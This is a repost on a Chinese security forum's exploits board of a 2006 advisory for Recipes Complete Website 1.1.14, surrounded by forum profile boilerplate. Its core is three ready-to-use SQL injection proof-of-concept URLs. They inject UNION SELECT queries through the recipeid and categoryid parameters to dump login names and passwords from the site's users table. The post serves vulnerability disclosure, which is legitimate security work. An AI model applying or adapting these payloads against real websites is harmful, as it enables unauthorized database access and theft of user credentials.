Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-11-24 12:00 只看该作者

Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities

复制内容到剪贴板

代码:

                                #

* Recipes Complete Website 1.1.14  ([url]http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2[/url]) ;    #

                                #  

* Class = SQL Injection ;                          #

                                  #

* Download = [url]http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3[/url] ;         #

                                #

* Found by = GregStar (gregstar[at]c4f[dot]pl) ([url]http://c4f.pl[/url]) ;                    #

                                 #

-------------------------------------------------------------------------------------------------------------------------#

                                #

                                #

- PoC:                                    #

                                #

http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*      #

                               #

-------------------------------------------------------------------------------------------------------------------------#

http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*  - login    #                        

                                #

-------------------------------------------------------------------------------------------------------------------------#

http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #

                               #

                                   

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.        #

                                    #

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities